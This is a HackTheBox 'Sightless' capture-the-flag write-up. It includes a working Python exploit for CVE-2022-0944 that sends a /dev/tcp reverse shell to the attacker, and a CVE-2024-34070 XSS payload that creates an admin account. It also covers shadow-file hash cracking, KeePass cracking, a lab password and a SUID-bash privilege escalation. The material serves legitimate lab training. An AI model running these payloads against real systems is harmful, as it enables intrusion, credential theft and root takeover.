HackTheBox Sightless Writeup

Explore the fundamentals of cybersecurity with the Sightless Capture The Flag (CTF) challenge, an easy-level experience designed to be accessible and ideal for beginners. This straightforward CTF write-up offers clear insights into essential Linux concepts.

Add Hosts

Edit the /etc/hosts file and add the following entries:

10.10.11.32 sightless.htb sqlpad.sightless.htb

This ensures that your system can resolve the domain names sightless.htb to the correct IP address 10.10.11.32.

Script to add hosts automatically

ip="10.10.11.32"
domain="sightless.htb sqlpad.sightless.htb admin.sightless.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV sightless.htb

Starting Nmap 7.95 ( https://nmap.org ) at 2024-09-14 04:47 CEST
Nmap scan report for sightless.htb (10.10.11.32)
Host is up (0.049s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings: 
|   GenericLines: 
|     220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_  256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Sightless.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.95%I=7%D=9/14%Time=66E4F941%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,A0,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20Ser
SF:ver\)\x20\[::ffff:10\.10\.11\.32\]\r\n500\x20Invalid\x20command:\x20try
SF:\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x20b
SF:eing\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

CVE-2022-0944

Time to prepare our listener to catch a reverse shell:

nc -lvnp 9001

The sqlpad service will be targeted using a known vulnerability (CVE-2022-0944). Below is a Python script to automate the exploitation process:

#!/bin/python
import os
import requests

root_url = "http://sqlpad.sightless.htb/"
attacker_ip = os.popen("ip a | grep -A 2 'tun0:' | grep -oP '(?<=inet\\s)\\d+(\\.\\d+){3}'").read().strip()
attacker_port = "9001"
target_url = f"{root_url}/api/test-connection"
payload = f"{{{{ process.mainModule.require('child_process').exec('/bin/bash -c \"bash -i >& /dev/tcp/{attacker_ip}/{attacker_port} 0>&1\"') }}}}"
headers = {
    'Content-Type': 'application/json',
    'Accept': 'application/json'
}
data = {
    "name": "test",
    "driver": "mysql",
    "data": {
        "database": payload
    },
    "database": payload
}

def main():
    try:
        response = requests.post(target_url, headers=headers, json=data)
        print(f"Response status code: {response.status_code}")
        print(f"Response body: {response.text}")
        if response.status_code == 200:
            print(f"Exploit sent successfully. Check your listener on {attacker_ip}:{attacker_port}")
        else:
            print(f"Exploit sent, but server responded with status code: {response.status_code}. Check your listener.")
    except Exception as e:
        print(f"Error: {e}")

main()

Docker Environment

Run the following commands to confirm you are inside a Docker container:

ls / -la

If you find /docker-entrypoint or /proc/1/cgroup suggests a Docker environment, proceed to the next step.

Get Michael’s Hash

cat /etc/shadow

Extract the hash for the user michael .

Brute Force the Hash

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat 1800 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt

SSH into the Target

Use the cracked password to SSH into michael’s account:

ssh michael@sightless.htb

cat user.txt

Foxlor Intended CVE-2024-34070

Port forwarding:

sshpass -p insaneclownposse ssh michael@sightless.htb -L 8081:localhost:8080 -N -f

http://admin.sightless.htb:8081/

CVE-2024-34070

admin{{$emit.constructor`function+b(){+var+metaTag%3ddocument.querySelector('meta[name%3d"csrf-token"]')%3b+var+csrfToken%3dmetaTag.getAttribute('content')%3b+var+xhr%3dnew+XMLHttpRequest()%3b+var+url%3d"http%3a//admin.sightless.htb%3a8080/admin_admins.php"%3b+var+params%3d"new_loginname%3dabcd%26admin_password%3dAbcd%40%401234%26admin_password_suggestion%3dmgphdKecOu%26def_language%3den%26api_allowed%3d0%26api_allowed%3d1%26name%3dAbcd%26email%3dtest%40gmail.com%26custom_notes%3d%26custom_notes_show%3d0%26ipaddress%3d-1%26change_serversettings%3d0%26change_serversettings%3d1%26customers%3d0%26customers_ul%3d1%26customers_see_all%3d0%26customers_see_all%3d1%26domains%3d0%26domains_ul%3d1%26caneditphpsettings%3d0%26caneditphpsettings%3d1%26diskspace%3d0%26diskspace_ul%3d1%26traffic%3d0%26traffic_ul%3d1%26subdomains%3d0%26subdomains_ul%3d1%26emails%3d0%26emails_ul%3d1%26email_accounts%3d0%26email_accounts_ul%3d1%26email_forwarders%3d0%26email_forwarders_ul%3d1%26ftps%3d0%26ftps_ul%3d1%26mysqls%3d0%26mysqls_ul%3d1%26csrf_token%3d"%2bcsrfToken%2b"%26page%3dadmins%26action%3dadd%26send%3dsend"%3b+xhr.open("POST",url,true)%3b+xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded")%3b+xhr.send(params)}%3ba%3db()`()+}}

Intercep Foxlor login with burp

Change the loginname parameter

Log in with abcd:Abcd@@1234

You will see web1 ftp in link

Set the password for web1

Logout and Login with the web1

Now set the ftp password link

Crack the KeePass Database

1. Connect to the FTP Server:

   • Use the following command to connect:

     lftp sightless.htb
     

   • Log in with username web1 and the provided password:

     login web1 <password>
     

   • Disable certificate verification to avoid errors:

     set ssl:verify-certificate no
     

2. List and Retrieve Files:

   • List the available files:

     ls
     

     You will see output similar to:

     drwxr-xr-x   3 web1     web1         4096 May 17 03:17 goaccess
     -rw-r--r--   1 web1     web1         8376 Mar 29 10:29 index.html
     

   • Navigate to the goaccess directory and its backup subdirectory:

     cd goaccess/backup/
     ls
     

     Inside backup, you’ll find the KeePass database file (Database.kdb):

     -rw-r--r--   1 web1     web1         5292 Aug  6 14:29 Database.kdb
     

   • Download the KeePass database:

     get Database.kdb
     

3. Analyze the KeePass Database:

   • Use a tool like kpcli to attempt to open the database:

     kpcli --kdb Database.kdb
     

   • You will need the master password to proceed.

4. Crack the KeePass Password:

   • Extract the hash from the KeePass database and save it as Database.kdb.hash.
   • Use hashcat with a dictionary file (e.g., rockyou.txt) to crack the hash:

     keepass2john Database.kdb | tee Database.kdb.hash
     hashcat Database.kdb.hash /usr/share/dict/rockyou.txt --user -m 13400
     

   • If successful, hashcat will display the master password.

5. Access and Extract Data:

   • Open the KeePass database using the cracked password:

     kpcli --kdb Database.kdb
     

   • Navigate to the relevant section of the database:

     ls General/sightless.htb/Backup/
     show -f General/sightless.htb/Backup/ssh
     attach General/sightless.htb/Backup/ssh
     

6. Connect to the Target System:

   • Use the extracted SSH private key to log in as root:

     dos2unix id_rsa
     echo "" >> ~/id_rsa
     chmod 600 ~/id_rsa
     ssh -i ~/id_rsa root@sightless.htb
     

   To check for CRLF line endings, use exiftool for metadata or simply open the file in a text editor, where the line endings (LF/CRLF) are usually displayed in the UI.

7. Capture the Flag:

   • Read the root.txt file to complete the challenge:

     cat root.txt
     

Foxlor Unintended Chrome Debugging

This is possible because the --remote-debugging-port=0 flag is enabled in Chrome, allowing remote debugging.

sshpass -p insaneclownposse ssh michael@sightless.htb

To determine the correct ports, use the following commands to check for active processes and listening ports:

ps auxww | grep chrome
ss -tulpn

Alternatively, you can use tools like pspy to monitor or confirm activity.

Forward ports using SSH to access internal web services from your pc:

sshpass -p insaneclownposse ssh michael@sightless.htb -L 8081:localhost:8080 -N -f
sshpass -p insaneclownposse ssh michael@sightless.htb -L 44163:localhost:44163 -N -f

Note that port 44163 may vary, so check for the correct port using the earlier steps.

Now, on your PC, open Chromium with remote debugging enabled:

chromium

Next, navigate to the Chromium inspect devices page:

1. Open Chromium and go to: chrome://inspect/#devices.
2. Add localhost:44163 to forward and click inspect in the remote web service.
3. Inspect the website by pressing F12 to open Developer Tools, then go to the Network tab.
4. Make sure Preserve log is enabled for easier access to network activity.

You will find a POST request in the Foxlor service with the payload containing the username and password in the network logs.

For more details, refer to this resource: Chrome Remote Debugger Pentesting.

Web Exploitation

1. Inspect the website for a POST request to /index.php to capture the username and password.
2. Log in and add a PHP version at:

   http://admin.sightless.htb:8081/admin_phpsettings.php?page=fpmdaemons&action=add 
   

3. In the restart command, put:

   chmod 4755 /bin/bash
   

4. Restart the PHP-FPM service to trigger the command:

   http://admin.sightless.htb:8081/admin_settings.php?page=overview&part=phpfpm
   

ssh michael@sightless.htb

/bin/bash -p
cat /tmp/root.txt